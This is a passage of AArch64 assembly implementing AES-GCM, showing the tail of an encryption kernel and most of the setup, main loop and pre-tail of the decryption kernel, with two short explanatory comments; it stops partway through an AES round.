mvn x14, xzr // rkN_h = 0xffffffffffffffff
and x1, x1, #127 // bit_length %= 128
lsr x14, x14, x1 // rkN_h is mask for top 64b of last block
cmp x1, #64
csel x6, x13, x14, lt
csel x7, x14, xzr, lt
fmov d0, x6 // ctr0b is mask for last block
fmov v0.d[1], x7
and v5.16b, v5.16b, v0.16b // possibly partial last block has zeroes in highest bits
rev64 v4.16b, v5.16b // GHASH final block
eor v4.16b, v4.16b, v8.16b // feed in partial tag
bif v5.16b, v18.16b, v0.16b // insert existing bytes in top end of result before storing
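// NOTE (editorial annotation): the csel pair above turns the residual
// bit length into a 128-bit byte mask; AND-ing zeroes the bytes past
// the message end (so they cannot perturb the final GHASH block), and
// bif merges the unchanged destination bytes preloaded into v18 back
// in so the full 16-byte store below is safe.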
pmull2 v20.1q, v4.2d, v12.2d // GHASH final block - high
mov d8, v4.d[1] // GHASH final block - mid
rev w9, w12
pmull v21.1q, v4.1d, v12.1d // GHASH final block - low
eor v9.16b, v9.16b, v20.16b // GHASH final block - high
eor v8.8b, v8.8b, v4.8b // GHASH final block - mid
pmull v8.1q, v8.1d, v16.1d // GHASH final block - mid
eor v11.16b, v11.16b, v21.16b // GHASH final block - low
eor v10.16b, v10.16b, v8.16b // GHASH final block - mid
movi v8.8b, #0xc2
eor v4.16b, v11.16b, v9.16b // MODULO - karatsuba tidy up
shl d8, d8, #56 // mod_constant
eor v10.16b, v10.16b, v4.16b // MODULO - karatsuba tidy up
pmull v7.1q, v9.1d, v8.1d // MODULO - top 64b align with mid
ext v9.16b, v9.16b, v9.16b, #8 // MODULO - other top alignment
eor v10.16b, v10.16b, v7.16b // MODULO - fold into mid
eor v10.16b, v10.16b, v9.16b // MODULO - fold into mid
pmull v9.1q, v10.1d, v8.1d // MODULO - mid 64b align with low
ext v10.16b, v10.16b, v10.16b, #8 // MODULO - other mid alignment
str w9, [x16, #12] // store the updated counter
st1 { v5.16b}, [x2] // store all 16B
eor v11.16b, v11.16b, v9.16b // MODULO - fold into low
eor v11.16b, v11.16b, v10.16b // MODULO - fold into low
ext v11.16b, v11.16b, v11.16b, #8
rev64 v11.16b, v11.16b
mov x0, x15
st1 { v11.16b }, [x3]
ldp x19, x20, [sp, #16]
ldp x21, x22, [sp, #32]
ldp x23, x24, [sp, #48]
ldp d8, d9, [sp, #64]
ldp d10, d11, [sp, #80]
ldp d12, d13, [sp, #96]
ldp d14, d15, [sp, #112]
ldp x29, x30, [sp], #128
AARCH64_VALIDATE_LINK_REGISTER
ret
.globl _aes_gcm_dec_kernel
.private_extern _aes_gcm_dec_kernel
.align 4
_aes_gcm_dec_kernel:
AARCH64_SIGN_LINK_REGISTER
stp x29, x30, [sp, #-128]!
mov x29, sp
stp x19, x20, [sp, #16]
mov x16, x4
mov x8, x5
stp x21, x22, [sp, #32]
stp x23, x24, [sp, #48]
stp d8, d9, [sp, #64]
stp d10, d11, [sp, #80]
stp d12, d13, [sp, #96]
stp d14, d15, [sp, #112]
ldr w17, [x8, #240]
add x19, x8, x17, lsl #4 // borrow input_l1 for last key
ldp x13, x14, [x19] // load round N keys
ldr q31, [x19, #-16] // load round N-1 keys
lsr x5, x1, #3 // byte_len
mov x15, x5
ldp x10, x11, [x16] // ctr96_b64, ctr96_t32
ldr q26, [x8, #128] // load rk8
sub x5, x5, #1 // byte_len - 1
ldr q25, [x8, #112] // load rk7
and x5, x5, #0xffffffffffffffc0 // number of bytes to be processed in main loop (at least 1 byte must be handled by tail)
add x4, x0, x1, lsr #3 // end_input_ptr
ldr q24, [x8, #96] // load rk6
lsr x12, x11, #32
ldr q23, [x8, #80] // load rk5
orr w11, w11, w11
ldr q21, [x8, #48] // load rk3
add x5, x5, x0
rev w12, w12 // rev_ctr32
add w12, w12, #1 // increment rev_ctr32
fmov d3, x10 // CTR block 3
rev w9, w12 // CTR block 1
add w12, w12, #1 // CTR block 1
fmov d1, x10 // CTR block 1
orr x9, x11, x9, lsl #32 // CTR block 1
ld1 { v0.16b}, [x16] // special case vector load initial counter so we can start first AES block as quickly as possible
fmov v1.d[1], x9 // CTR block 1
rev w9, w12 // CTR block 2
add w12, w12, #1 // CTR block 2
fmov d2, x10 // CTR block 2
orr x9, x11, x9, lsl #32 // CTR block 2
fmov v2.d[1], x9 // CTR block 2
rev w9, w12 // CTR block 3
orr x9, x11, x9, lsl #32 // CTR block 3
ldr q18, [x8, #0] // load rk0
fmov v3.d[1], x9 // CTR block 3
add w12, w12, #1 // CTR block 3
ldr q22, [x8, #64] // load rk4
ldr q19, [x8, #16] // load rk1
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 0 - round 0
ldr q14, [x6, #48] // load h3l | h3h
ext v14.16b, v14.16b, v14.16b, #8
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 3 - round 0
ldr q15, [x6, #80] // load h4l | h4h
ext v15.16b, v15.16b, v15.16b, #8
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 1 - round 0
ldr q13, [x6, #32] // load h2l | h2h
ext v13.16b, v13.16b, v13.16b, #8
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 2 - round 0
ldr q20, [x8, #32] // load rk2
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 0 - round 1
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 1 - round 1
ld1 { v11.16b}, [x3]
ext v11.16b, v11.16b, v11.16b, #8
rev64 v11.16b, v11.16b
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 2 - round 1
ldr q27, [x8, #144] // load rk9
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 3 - round 1
ldr q30, [x8, #192] // load rk12
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 0 - round 2
ldr q12, [x6] // load h1l | h1h
ext v12.16b, v12.16b, v12.16b, #8
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 2 - round 2
ldr q28, [x8, #160] // load rk10
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 3 - round 2
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 0 - round 3
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 1 - round 2
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 3 - round 3
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 0 - round 4
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 2 - round 3
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 1 - round 3
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 3 - round 4
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 2 - round 4
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 1 - round 4
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 3 - round 5
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 0 - round 5
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 1 - round 5
aese v2.16b, v23.16b
aesmc v2.16b, v2.16b // AES block 2 - round 5
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 0 - round 6
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 3 - round 6
cmp x17, #12 // setup flags for AES-128/192/256 check
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 1 - round 6
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 2 - round 6
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 0 - round 7
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 1 - round 7
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 3 - round 7
aese v0.16b, v26.16b
aesmc v0.16b, v0.16b // AES block 0 - round 8
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 2 - round 7
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 3 - round 8
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 1 - round 8
ldr q29, [x8, #176] // load rk11
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 2 - round 8
b.lt Ldec_finish_first_blocks // branch if AES-128
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 0 - round 9
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 1 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 3 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 2 - round 9
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 0 - round 10
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 1 - round 10
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 3 - round 10
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 2 - round 10
b.eq Ldec_finish_first_blocks // branch if AES-192
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 0 - round 11
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 3 - round 11
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 1 - round 11
aese v2.16b, v29.16b
aesmc v2.16b, v2.16b // AES block 2 - round 11
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 1 - round 12
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 0 - round 12
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 2 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 3 - round 12
Ldec_finish_first_blocks:
cmp x0, x5 // check if we have <= 4 blocks
trn1 v9.2d, v14.2d, v15.2d // h4h | h3h
trn2 v17.2d, v14.2d, v15.2d // h4l | h3l
trn1 v8.2d, v12.2d, v13.2d // h2h | h1h
trn2 v16.2d, v12.2d, v13.2d // h2l | h1l
eor v17.16b, v17.16b, v9.16b // h4k | h3k
aese v1.16b, v31.16b // AES block 1 - round N-1
aese v2.16b, v31.16b // AES block 2 - round N-1
eor v16.16b, v16.16b, v8.16b // h2k | h1k
aese v3.16b, v31.16b // AES block 3 - round N-1
aese v0.16b, v31.16b // AES block 0 - round N-1
b.ge Ldec_tail // handle tail
ldr q4, [x0, #0] // AES block 0 - load ciphertext
ldr q5, [x0, #16] // AES block 1 - load ciphertext
rev w9, w12 // CTR block 4
eor v0.16b, v4.16b, v0.16b // AES block 0 - result
eor v1.16b, v5.16b, v1.16b // AES block 1 - result
rev64 v5.16b, v5.16b // GHASH block 1
ldr q7, [x0, #48] // AES block 3 - load ciphertext
mov x7, v0.d[1] // AES block 0 - mov high
mov x6, v0.d[0] // AES block 0 - mov low
rev64 v4.16b, v4.16b // GHASH block 0
add w12, w12, #1 // CTR block 4
fmov d0, x10 // CTR block 4
orr x9, x11, x9, lsl #32 // CTR block 4
fmov v0.d[1], x9 // CTR block 4
rev w9, w12 // CTR block 5
add w12, w12, #1 // CTR block 5
mov x19, v1.d[0] // AES block 1 - mov low
orr x9, x11, x9, lsl #32 // CTR block 5
mov x20, v1.d[1] // AES block 1 - mov high
eor x7, x7, x14 // AES block 0 - round N high
eor x6, x6, x13 // AES block 0 - round N low
stp x6, x7, [x2], #16 // AES block 0 - store result
fmov d1, x10 // CTR block 5
ldr q6, [x0, #32] // AES block 2 - load ciphertext
add x0, x0, #64 // AES input_ptr update
fmov v1.d[1], x9 // CTR block 5
rev w9, w12 // CTR block 6
add w12, w12, #1 // CTR block 6
eor x19, x19, x13 // AES block 1 - round N low
orr x9, x11, x9, lsl #32 // CTR block 6
eor x20, x20, x14 // AES block 1 - round N high
stp x19, x20, [x2], #16 // AES block 1 - store result
eor v2.16b, v6.16b, v2.16b // AES block 2 - result
cmp x0, x5 // check if we have <= 8 blocks
b.ge Ldec_prepretail // do prepretail
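// NOTE (editorial annotation): the decrypt main loop mirrors the
// encrypt one, but GHASH is taken over the ciphertext, so each loaded
// input block both feeds the hash (rev64 into v4-v7) and is XORed
// with keystream to produce the plaintext stored via stp.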
Ldec_main_loop: // main loop start
mov x21, v2.d[0] // AES block 4k+2 - mov low
ext v11.16b, v11.16b, v11.16b, #8 // PRE 0
eor v3.16b, v7.16b, v3.16b // AES block 4k+3 - result
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 0
mov x22, v2.d[1] // AES block 4k+2 - mov high
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 0
fmov d2, x10 // CTR block 4k+6
fmov v2.d[1], x9 // CTR block 4k+6
eor v4.16b, v4.16b, v11.16b // PRE 1
rev w9, w12 // CTR block 4k+7
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 1
mov x24, v3.d[1] // AES block 4k+3 - mov high
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 1
mov x23, v3.d[0] // AES block 4k+3 - mov low
pmull2 v9.1q, v4.2d, v15.2d // GHASH block 4k - high
mov d8, v4.d[1] // GHASH block 4k - mid
fmov d3, x10 // CTR block 4k+7
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 2
orr x9, x11, x9, lsl #32 // CTR block 4k+7
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 0
fmov v3.d[1], x9 // CTR block 4k+7
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 2
eor v8.8b, v8.8b, v4.8b // GHASH block 4k - mid
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 3
eor x22, x22, x14 // AES block 4k+2 - round N high
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 1
mov d10, v17.d[1] // GHASH block 4k - mid
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 3
rev64 v6.16b, v6.16b // GHASH block 4k+2
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 0
eor x21, x21, x13 // AES block 4k+2 - round N low
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 2
stp x21, x22, [x2], #16 // AES block 4k+2 - store result
pmull v11.1q, v4.1d, v15.1d // GHASH block 4k - low
pmull2 v4.1q, v5.2d, v14.2d // GHASH block 4k+1 - high
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 3
rev64 v7.16b, v7.16b // GHASH block 4k+3
pmull v10.1q, v8.1d, v10.1d // GHASH block 4k - mid
eor x23, x23, x13 // AES block 4k+3 - round N low
pmull v8.1q, v5.1d, v14.1d // GHASH block 4k+1 - low
eor x24, x24, x14 // AES block 4k+3 - round N high
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+1 - high
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 4
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 1
mov d4, v5.d[1] // GHASH block 4k+1 - mid
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 4
eor v11.16b, v11.16b, v8.16b // GHASH block 4k+1 - low
aese v2.16b, v23.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 5
add w12, w12, #1 // CTR block 4k+7
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 2
mov d8, v6.d[1] // GHASH block 4k+2 - mid
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 4
eor v4.8b, v4.8b, v5.8b // GHASH block 4k+1 - mid
pmull v5.1q, v6.1d, v13.1d // GHASH block 4k+2 - low
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 3
eor v8.8b, v8.8b, v6.8b // GHASH block 4k+2 - mid
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 5
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 5
eor v11.16b, v11.16b, v5.16b // GHASH block 4k+2 - low
pmull v4.1q, v4.1d, v17.1d // GHASH block 4k+1 - mid
rev w9, w12 // CTR block 4k+8
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 6
ins v8.d[1], v8.d[0] // GHASH block 4k+2 - mid
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 6
add w12, w12, #1 // CTR block 4k+8
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 4
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 7
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+1 - mid
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 7
pmull2 v4.1q, v6.2d, v13.2d // GHASH block 4k+2 - high
mov d6, v7.d[1] // GHASH block 4k+3 - mid
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 5
pmull2 v8.1q, v8.2d, v16.2d // GHASH block 4k+2 - mid
aese v0.16b, v26.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 8
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+2 - high
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 6
pmull v4.1q, v7.1d, v12.1d // GHASH block 4k+3 - low
orr x9, x11, x9, lsl #32 // CTR block 4k+8
eor v10.16b, v10.16b, v8.16b // GHASH block 4k+2 - mid
pmull2 v5.1q, v7.2d, v12.2d // GHASH block 4k+3 - high
cmp x17, #12 // setup flags for AES-128/192/256 check
eor v6.8b, v6.8b, v7.8b // GHASH block 4k+3 - mid
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 8
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 6
eor v9.16b, v9.16b, v5.16b // GHASH block 4k+3 - high
pmull v6.1q, v6.1d, v16.1d // GHASH block 4k+3 - mid
movi v8.8b, #0xc2
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 7
eor v11.16b, v11.16b, v4.16b // GHASH block 4k+3 - low
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 7
shl d8, d8, #56 // mod_constant
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 8
eor v10.16b, v10.16b, v6.16b // GHASH block 4k+3 - mid
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 8
b.lt Ldec_main_loop_continue // branch if AES-128
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 9
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 9
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 10
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 10
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 10
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 10
b.eq Ldec_main_loop_continue // branch if AES-192
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 11
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 11
aese v2.16b, v29.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 11
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 11
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 12
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 12
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 12
Ldec_main_loop_continue:
pmull v7.1q, v9.1d, v8.1d // MODULO - top 64b align with mid
eor v6.16b, v11.16b, v9.16b // MODULO - karatsuba tidy up
ldr q4, [x0, #0] // AES block 4k+4 - load ciphertext
aese v0.16b, v31.16b // AES block 4k+4 - round N-1
ext v9.16b, v9.16b, v9.16b, #8 // MODULO - other top alignment
eor v10.16b, v10.16b, v6.16b // MODULO - karatsuba tidy up
ldr q5, [x0, #16] // AES block 4k+5 - load ciphertext
eor v0.16b, v4.16b, v0.16b // AES block 4k+4 - result
stp x23, x24, [x2], #16 // AES block 4k+3 - store result
eor v10.16b, v10.16b, v7.16b // MODULO - fold into mid
ldr q7, [x0, #48] // AES block 4k+7 - load ciphertext
ldr q6, [x0, #32] // AES block 4k+6 - load ciphertext
mov x7, v0.d[1] // AES block 4k+4 - mov high
eor v10.16b, v10.16b, v9.16b // MODULO - fold into mid
aese v1.16b, v31.16b // AES block 4k+5 - round N-1
add x0, x0, #64 // AES input_ptr update
mov x6, v0.d[0] // AES block 4k+4 - mov low
fmov d0, x10 // CTR block 4k+8
fmov v0.d[1], x9 // CTR block 4k+8
pmull v8.1q, v10.1d, v8.1d // MODULO - mid 64b align with low
eor v1.16b, v5.16b, v1.16b // AES block 4k+5 - result
rev w9, w12 // CTR block 4k+9
aese v2.16b, v31.16b // AES block 4k+6 - round N-1
orr x9, x11, x9, lsl #32 // CTR block 4k+9
cmp x0, x5 // LOOP CONTROL
add w12, w12, #1 // CTR block 4k+9
eor x6, x6, x13 // AES block 4k+4 - round N low
eor x7, x7, x14 // AES block 4k+4 - round N high
mov x20, v1.d[1] // AES block 4k+5 - mov high
eor v2.16b, v6.16b, v2.16b // AES block 4k+6 - result
eor v11.16b, v11.16b, v8.16b // MODULO - fold into low
mov x19, v1.d[0] // AES block 4k+5 - mov low
fmov d1, x10 // CTR block 4k+9
ext v10.16b, v10.16b, v10.16b, #8 // MODULO - other mid alignment
fmov v1.d[1], x9 // CTR block 4k+9
rev w9, w12 // CTR block 4k+10
add w12, w12, #1 // CTR block 4k+10
aese v3.16b, v31.16b // AES block 4k+7 - round N-1
orr x9, x11, x9, lsl #32 // CTR block 4k+10
rev64 v5.16b, v5.16b // GHASH block 4k+5
eor x20, x20, x14 // AES block 4k+5 - round N high
stp x6, x7, [x2], #16 // AES block 4k+4 - store result
eor x19, x19, x13 // AES block 4k+5 - round N low
stp x19, x20, [x2], #16 // AES block 4k+5 - store result
rev64 v4.16b, v4.16b // GHASH block 4k+4
eor v11.16b, v11.16b, v10.16b // MODULO - fold into low
b.lt Ldec_main_loop
Ldec_prepretail: // PREPRETAIL
ext v11.16b, v11.16b, v11.16b, #8 // PRE 0
mov x21, v2.d[0] // AES block 4k+2 - mov low
eor v3.16b, v7.16b, v3.16b // AES block 4k+3 - result
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 0
mov x22, v2.d[1] // AES block 4k+2 - mov high
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 0
fmov d2, x10 // CTR block 4k+6
fmov v2.d[1], x9 // CTR block 4k+6
rev w9, w12 // CTR block 4k+7
eor v4.16b, v4.16b, v11.16b // PRE 1
rev64 v6.16b, v6.16b // GHASH block 4k+2
orr x9, x11, x9, lsl #32 // CTR block 4k+7
mov x23, v3.d[0] // AES block 4k+3 - mov low
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 1
mov x24, v3.d[1] // AES block 4k+3 - mov high
pmull v11.1q, v4.1d, v15.1d // GHASH block 4k - low
mov d8, v4.d[1] // GHASH block 4k - mid
fmov d3, x10 // CTR block 4k+7
pmull2 v9.1q, v4.2d, v15.2d // GHASH block 4k - high
fmov v3.d[1], x9 // CTR block 4k+7
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 0
mov d10, v17.d[1] // GHASH block 4k - mid
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 1
eor v8.8b, v8.8b, v4.8b // GHASH block 4k - mid
pmull2 v4.1q, v5.2d, v14.2d // GHASH block 4k+1 - high
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 1
rev64 v7.16b, v7.16b // GHASH block 4k+3
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 0
pmull v10.1q, v8.1d, v10.1d // GHASH block 4k - mid
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+1 - high
pmull v8.1q, v5.1d, v14.1d // GHASH block 4k+1 - low
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 1
mov d4, v5.d[1] // GHASH block 4k+1 - mid
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 2
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 2
eor v11.16b, v11.16b, v8.16b // GHASH block 4k+1 - low
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 2
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 3
mov d8, v6.d[1] // GHASH block 4k+2 - mid
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 2
eor v4.8b, v4.8b, v5.8b // GHASH block 4k+1 - mid
pmull v5.1q, v6.1d, v13.1d // GHASH block 4k+2 - low
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 4
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 3
eor v8.8b, v8.8b, v6.8b // GHASH block 4k+2 - mid
pmull v4.1q, v4.1d, v17.1d // GHASH block 4k+1 - mid
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 5
eor v11.16b, v11.16b, v5.16b // GHASH block 4k+2 - low
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 4
pmull2 v5.1q, v7.2d, v12.2d // GHASH block 4k+3 - high
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+1 - mid
pmull2 v4.1q, v6.2d, v13.2d // GHASH block 4k+2 - high
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 5
ins v8.d[1], v8.d[0] // GHASH block 4k+2 - mid
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 3
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 3
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+2 - high
pmull v4.1q, v7.1d, v12.1d // GHASH block 4k+3 - low
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 4
mov d6, v7.d[1] // GHASH block 4k+3 - mid
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 4
pmull2 v8.1q, v8.2d, v16.2d // GHASH block 4k+2 - mid
aese v2.16b, v23.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 5
eor v6.8b, v6.8b, v7.8b // GHASH block 4k+3 - mid
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 5
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 6
eor v10.16b, v10.16b, v8.16b // GHASH block 4k+2 - mid
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 6
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 6
movi v8.8b, #0xc2
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 6
eor v11.16b, v11.16b, v4.16b // GHASH block 4k+3 - low
pmull v6.1q, v6.1d, v16.1d // GHASH block 4k+3 - mid
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 7
cmp x17, #12 // setup flags for AES-128/192/256 check
eor v9.16b, v9.16b, v5.16b // GHASH block 4k+3 - high
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 7
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 7
eor v10.16b, v10.16b, v6.16b // GHASH block 4k+3 - mid
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 8
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 7
eor v6.16b, v11.16b, v9.16b // MODULO - karatsuba tidy up
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 8
aese v0.16b, v26.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 8
shl d8, d8, #56 // mod_constant
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 8
b.lt Ldec_finish_prepretail // branch if AES-128
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 9
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 9
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 10
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 10
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 10
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 10
b.eq Ldec_finish_prepretail // branch if AES-192
aese v2.16b, v29.16b
